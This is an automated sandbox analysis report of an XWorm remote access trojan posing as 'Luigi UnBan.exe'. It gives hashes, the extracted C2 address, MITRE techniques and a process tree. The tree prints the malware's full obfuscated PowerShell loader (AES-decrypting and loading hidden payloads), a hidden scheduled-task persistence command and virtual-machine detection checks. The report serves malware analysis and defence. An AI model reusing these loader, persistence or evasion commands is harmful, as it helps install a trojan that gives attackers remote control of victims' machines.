xworm | 0f3a0a876e198379b45b75a0c06ee8f3cab91eb26fd868fab769ed72b804f600

Analysis

max time kernel
36s
max time network
50s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12-11-2024 05:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Luigi UnBan.exe
Size

178.2MB
MD5

fdaf5b201a0e1c706e755cf2dcf6adb4
SHA1

015461363ad9a3897d2ea5deda2fa44fe57756f3
SHA256

0f3a0a876e198379b45b75a0c06ee8f3cab91eb26fd868fab769ed72b804f600
SHA512

cc0e9a65170e318a4faad0a28aa7458dc0367027b7419049b0dce2baa1df535e7f776395b904be8466b055b1a40a97317cead9adb96afde637e82343f4d1ba91
SSDEEP

1572864:3gm3YzFXmdksvLt/u5ZnKBE5MoDNU0gj67dnHE7:3gm3YYdkqZu6E5Mg7dK

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

80.76.49.227:9999

Mutex

g0vzRORqzebeaKQj

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/5108-55-0x0000018D58520000-0x0000018D5852E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
30	5108	powershell.exe
44	5108	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2864	powershell.exe
3680	powershell.exe
5108	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	Luigi UnBan.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Luigi UnBan.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion	Luigi UnBan.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Luigi UnBan.exe

Gathers network information 2 TTPs 4 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4640	ipconfig.exe
2788	ipconfig.exe
1380	ipconfig.exe
2068	ipconfig.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2864	powershell.exe
2864	powershell.exe
3680	powershell.exe
3680	powershell.exe
5108	powershell.exe
5108	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4264	WMIC.exe
Token: SeSecurityPrivilege	4264	WMIC.exe
Token: SeTakeOwnershipPrivilege	4264	WMIC.exe
Token: SeLoadDriverPrivilege	4264	WMIC.exe
Token: SeSystemProfilePrivilege	4264	WMIC.exe
Token: SeSystemtimePrivilege	4264	WMIC.exe
Token: SeProfSingleProcessPrivilege	4264	WMIC.exe
Token: SeIncBasePriorityPrivilege	4264	WMIC.exe
Token: SeCreatePagefilePrivilege	4264	WMIC.exe
Token: SeBackupPrivilege	4264	WMIC.exe
Token: SeRestorePrivilege	4264	WMIC.exe
Token: SeShutdownPrivilege	4264	WMIC.exe
Token: SeDebugPrivilege	4264	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4264	WMIC.exe
Token: SeRemoteShutdownPrivilege	4264	WMIC.exe
Token: SeUndockPrivilege	4264	WMIC.exe
Token: SeManageVolumePrivilege	4264	WMIC.exe
Token: 33	4264	WMIC.exe
Token: 34	4264	WMIC.exe
Token: 35	4264	WMIC.exe
Token: 36	4264	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4264	WMIC.exe
Token: SeSecurityPrivilege	4264	WMIC.exe
Token: SeTakeOwnershipPrivilege	4264	WMIC.exe
Token: SeLoadDriverPrivilege	4264	WMIC.exe
Token: SeSystemProfilePrivilege	4264	WMIC.exe
Token: SeSystemtimePrivilege	4264	WMIC.exe
Token: SeProfSingleProcessPrivilege	4264	WMIC.exe
Token: SeIncBasePriorityPrivilege	4264	WMIC.exe
Token: SeCreatePagefilePrivilege	4264	WMIC.exe
Token: SeBackupPrivilege	4264	WMIC.exe
Token: SeRestorePrivilege	4264	WMIC.exe
Token: SeShutdownPrivilege	4264	WMIC.exe
Token: SeDebugPrivilege	4264	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4264	WMIC.exe
Token: SeRemoteShutdownPrivilege	4264	WMIC.exe
Token: SeUndockPrivilege	4264	WMIC.exe
Token: SeManageVolumePrivilege	4264	WMIC.exe
Token: 33	4264	WMIC.exe
Token: 34	4264	WMIC.exe
Token: 35	4264	WMIC.exe
Token: 36	4264	WMIC.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	3680	powershell.exe
Token: SeIncreaseQuotaPrivilege	3680	powershell.exe
Token: SeSecurityPrivilege	3680	powershell.exe
Token: SeTakeOwnershipPrivilege	3680	powershell.exe
Token: SeLoadDriverPrivilege	3680	powershell.exe
Token: SeSystemProfilePrivilege	3680	powershell.exe
Token: SeSystemtimePrivilege	3680	powershell.exe
Token: SeProfSingleProcessPrivilege	3680	powershell.exe
Token: SeIncBasePriorityPrivilege	3680	powershell.exe
Token: SeCreatePagefilePrivilege	3680	powershell.exe
Token: SeBackupPrivilege	3680	powershell.exe
Token: SeRestorePrivilege	3680	powershell.exe
Token: SeShutdownPrivilege	3680	powershell.exe
Token: SeDebugPrivilege	3680	powershell.exe
Token: SeSystemEnvironmentPrivilege	3680	powershell.exe
Token: SeRemoteShutdownPrivilege	3680	powershell.exe
Token: SeUndockPrivilege	3680	powershell.exe
Token: SeManageVolumePrivilege	3680	powershell.exe
Token: 33	3680	powershell.exe
Token: 34	3680	powershell.exe
Token: 35	3680	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 2260 wrote to memory of 4912	2260	Luigi UnBan.exe	88
PID 2260 wrote to memory of 4912	2260	Luigi UnBan.exe	88
PID 4912 wrote to memory of 4264	4912	cmd.exe	90
PID 4912 wrote to memory of 4264	4912	cmd.exe	90
PID 4912 wrote to memory of 1652	4912	cmd.exe	91
PID 4912 wrote to memory of 1652	4912	cmd.exe	91
PID 2260 wrote to memory of 1248	2260	Luigi UnBan.exe	93
PID 2260 wrote to memory of 1248	2260	Luigi UnBan.exe	93
PID 1248 wrote to memory of 2864	1248	cmd.exe	96
PID 1248 wrote to memory of 2864	1248	cmd.exe	96
PID 2864 wrote to memory of 3680	2864	powershell.exe	97
PID 2864 wrote to memory of 3680	2864	powershell.exe	97
PID 2864 wrote to memory of 4732	2864	powershell.exe	99
PID 2864 wrote to memory of 4732	2864	powershell.exe	99
PID 4732 wrote to memory of 1812	4732	WScript.exe	100
PID 4732 wrote to memory of 1812	4732	WScript.exe	100
PID 1812 wrote to memory of 5108	1812	cmd.exe	103
PID 1812 wrote to memory of 5108	1812	cmd.exe	103
PID 2260 wrote to memory of 3528	2260	Luigi UnBan.exe	107
PID 2260 wrote to memory of 3528	2260	Luigi UnBan.exe	107
PID 3528 wrote to memory of 4640	3528	cmd.exe	109
PID 3528 wrote to memory of 4640	3528	cmd.exe	109
PID 2260 wrote to memory of 4868	2260	Luigi UnBan.exe	110
PID 2260 wrote to memory of 4868	2260	Luigi UnBan.exe	110
PID 2260 wrote to memory of 2708	2260	Luigi UnBan.exe	113
PID 2260 wrote to memory of 2708	2260	Luigi UnBan.exe	113
PID 2708 wrote to memory of 1380	2708	cmd.exe	115
PID 2708 wrote to memory of 1380	2708	cmd.exe	115
PID 2260 wrote to memory of 4708	2260	Luigi UnBan.exe	116
PID 2260 wrote to memory of 4708	2260	Luigi UnBan.exe	116
PID 4708 wrote to memory of 2068	4708	cmd.exe	118
PID 4708 wrote to memory of 2068	4708	cmd.exe	118

C:\Users\Admin\AppData\Local\Temp\Luigi UnBan.exe
"C:\Users\Admin\AppData\Local\Temp\Luigi UnBan.exe"
1⤵
- Checks computer location settings
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2260
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\Win32Temp.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4912
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get Model
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4264
- - C:\Windows\system32\findstr.exe
    findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
    3⤵
    PID:1652
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\Win64Temp.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1248
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4pr42IAhLNXaMsLDATuTCXnSN37MkzjWlGCxvlpI204='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mUAA0rhmn7r0Y49Br4h9Tg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NWFXD=New-Object System.IO.MemoryStream(,$param_var); $TWFke=New-Object System.IO.MemoryStream; $XkRIU=New-Object System.IO.Compression.GZipStream($NWFXD, [IO.Compression.CompressionMode]::Decompress); $XkRIU.CopyTo($TWFke); $XkRIU.Dispose(); $NWFXD.Dispose(); $TWFke.Dispose(); $TWFke.ToArray();}function execute_function($param_var,$param2_var){ $SgoJi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $obVxl=$SgoJi.EntryPoint; $obVxl.Invoke($null, $param2_var);}$HAian = 'C:\Users\Admin\AppData\Local\Temp\Win64Temp.bat';$host.UI.RawUI.WindowTitle = $HAian;$jwIhR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HAian).Split([Environment]::NewLine);foreach ($fbsbe in $jwIhR) { if ($fbsbe.StartsWith(':: ')) { $Eaalc=$fbsbe.Substring(3); break; }}$payloads_var=[string[]]$Eaalc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2864
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_965_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_965.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3680
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_965.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:4732
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_965.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1812
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4pr42IAhLNXaMsLDATuTCXnSN37MkzjWlGCxvlpI204='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mUAA0rhmn7r0Y49Br4h9Tg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NWFXD=New-Object System.IO.MemoryStream(,$param_var); $TWFke=New-Object System.IO.MemoryStream; $XkRIU=New-Object System.IO.Compression.GZipStream($NWFXD, [IO.Compression.CompressionMode]::Decompress); $XkRIU.CopyTo($TWFke); $XkRIU.Dispose(); $NWFXD.Dispose(); $TWFke.Dispose(); $TWFke.ToArray();}function execute_function($param_var,$param2_var){ $SgoJi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $obVxl=$SgoJi.EntryPoint; $obVxl.Invoke($null, $param2_var);}$HAian = 'C:\Users\Admin\AppData\Roaming\startup_str_965.bat';$host.UI.RawUI.WindowTitle = $HAian;$jwIhR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HAian).Split([Environment]::NewLine);foreach ($fbsbe in $jwIhR) { if ($fbsbe.StartsWith(':: ')) { $Eaalc=$fbsbe.Substring(3); break; }}$payloads_var=[string[]]$Eaalc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5108
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ipconfig /release
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3528
- - C:\Windows\system32\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:4640
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ipconfig /renew
  2⤵
  PID:4868
- - C:\Windows\system32\ipconfig.exe
    ipconfig /renew
    3⤵
    - Gathers network information
    PID:2788
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ipconfig /flushdns
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2708
- - C:\Windows\system32\ipconfig.exe
    ipconfig /flushdns
    3⤵
    - Gathers network information
    PID:1380
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c Ipconfig /renew
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4708
- - C:\Windows\system32\ipconfig.exe
    Ipconfig /renew
    3⤵
    - Gathers network information
    PID:2068

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5c0923e8e7765d761022bd427d59e9ca

SHA1
7490e1b19c5662e6339a68ba67920992dbfa3d33

SHA256
299f9fcb2628833eea10626dc3888f94f104d317cb95c846ef61e3cf4521efa7

SHA512
a8e9a422d44ddfa8ceba2b245660e2657b3d2bd416d59dcc667baa74fcf113ec09b9b1c394aec37fe0c8aac10f938c710de3c0909db03b605097aa62569c01e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Win32Temp.bat

Filesize
7.0MB

MD5
0e7be50d14359ee381e440f14a9b4ddf

SHA1
b3c849e1157eba02e7f0403655db4851623a6f10

SHA256
2d008467a42b452490542f14ce735f0a628a64f3e75d86698d8a8da86d0580bd

SHA512
0e7e5e81e300b544587d7662b4135600673f4230658a7a81e9a295276aa7c4f0cbfc8c75df212616355bc460592373f4d4a7f6d1dc3b7a0594c60e7f5c98f87c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Win64Temp.bat

Filesize
478KB

MD5
09c4764995d1f2e96d0a228743f2425e

SHA1
0a755c43e147141ec0e9d96d243765af66d1e8a0

SHA256
c4db1679718dfb67fb33fcedced456035056f41b68fc071379d27d8bd708e6ab

SHA512
856759d72b6fff895d336acb8f86ac82ad8560f5229c1cd12baf25bf6ea9ee80035d364c69c00e66bbe9678f788a635f837032a92d3f08008a8343dcc992ff6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f3oxvvwm.gqt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_965.vbs

Filesize
115B

MD5
6f8fa388827d46a4f5649036d837a704

SHA1
ad723f313e1cd73b229a398ab0d63f7495a37e32

SHA256
fc0916203205b84a025c7a2dc1f20bac8ab4f1b17428a07e5ea97b56a8e74c7b

SHA512
cef4fd49fbf8d0ba043f7b8017eb0f04308ace4b63140f8a828b1b80f1c93d21c3444181a8c60d13f2cf36cf3d38c90e120cd0b8c923b23a5fcedbb3bae61c9e

Download Submit
memory/2864-12-0x00000170EA5C0000-0x00000170EA5E2000-memory.dmp

Filesize
136KB

Download
memory/2864-22-0x00000170E83C0000-0x00000170E83C8000-memory.dmp

Filesize
32KB

Download
memory/2864-23-0x00000170EA830000-0x00000170EA862000-memory.dmp

Filesize
200KB

Download
memory/5108-54-0x0000018D584E0000-0x0000018D58512000-memory.dmp

Filesize
200KB

Download
memory/5108-55-0x0000018D58520000-0x0000018D5852E000-memory.dmp

Filesize
56KB

Download
memory/5108-56-0x0000018D5A970000-0x0000018D5A97C000-memory.dmp

Filesize
48KB

Download